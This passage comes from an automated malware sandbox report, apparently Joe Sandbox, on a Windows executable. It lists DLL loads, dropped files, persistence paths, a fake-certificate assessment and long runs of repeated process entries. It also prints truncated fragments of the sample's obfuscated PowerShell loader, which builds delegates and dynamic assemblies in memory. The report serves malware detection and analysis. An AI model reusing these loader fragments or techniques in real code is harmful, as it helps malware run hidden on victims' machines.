          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeFile written: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Rediscovery\gdningsopbevaringerne.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: bddTkmucZP.exeStatic file information: File size 1536552 > 1048576
          Source: bddTkmucZP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000001.00000002.1524381754.000000000BA44000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Rygsjle $Tehran $Begroedes226), (Fredsbevarelse @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ingvald = [AppDomain]::CurrentDomain.GetAssemblies()$global
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Settere)), $Deriveres).DefineDynamicModule($Barbe, $false).DefineType($Unfond, $Paralectotype, [System.MulticastDelegate])$Quaderni.De
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07E3ED9C pushad ; ret 1_2_07E3ED9D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_09B92D15 push eax; iretd 1_2_09B92D4A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_09BA2289 push ss; ret 1_2_09BA2299
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_09BA5504 push edi; ret 1_2_09BA550C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_09BA2943 push edx; ret 1_2_09BA294A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029D891E pushad ; iretd 11_2_029D891F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029D8C2F pushfd ; iretd 11_2_029D8C30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_029D8DDF push esp; iretd 11_2_029D8DE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_03E72289 push ss; ret 11_2_03E72299
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_03E72943 push edx; ret 11_2_03E7294A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_03E75504 push edi; ret 11_2_03E7550C

          Persistence and Installation Behavior

          barindex
          Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject exactly) which is inherently untrustworthy 2) Invalid signature that's not trusted by provider 3) Suspicious organization name 'Spleened' which is not a known legitimate company 4) Highly suspicious email domain 'Tangs.Vi' which appears to be non-standard/fake 5) Large time gap between compilation date (Aug 2020) and certificate dates (Nov 2024-2025) suggests possible certificate manipulation 6) While the country code is France (FR) which is generally trusted, other elements in the certificate chain appear deliberately obscure or nonsensical (e.g., 'Parrotlike' in OU field) 7) The certificate validity period starts in the future relative to compilation date, which is illogical and suspicious. These factors combined strongly suggest this is a malicious file using a fake certificate.
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Rediscovery\bddTkmucZP.exeJump to dropped file
          Source: C:\Users\user\Desktop\bddTkmucZP.exeFile created: C:\Users\user\AppData\Local\Temp\nsg2A1D.tmp\nsExec.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
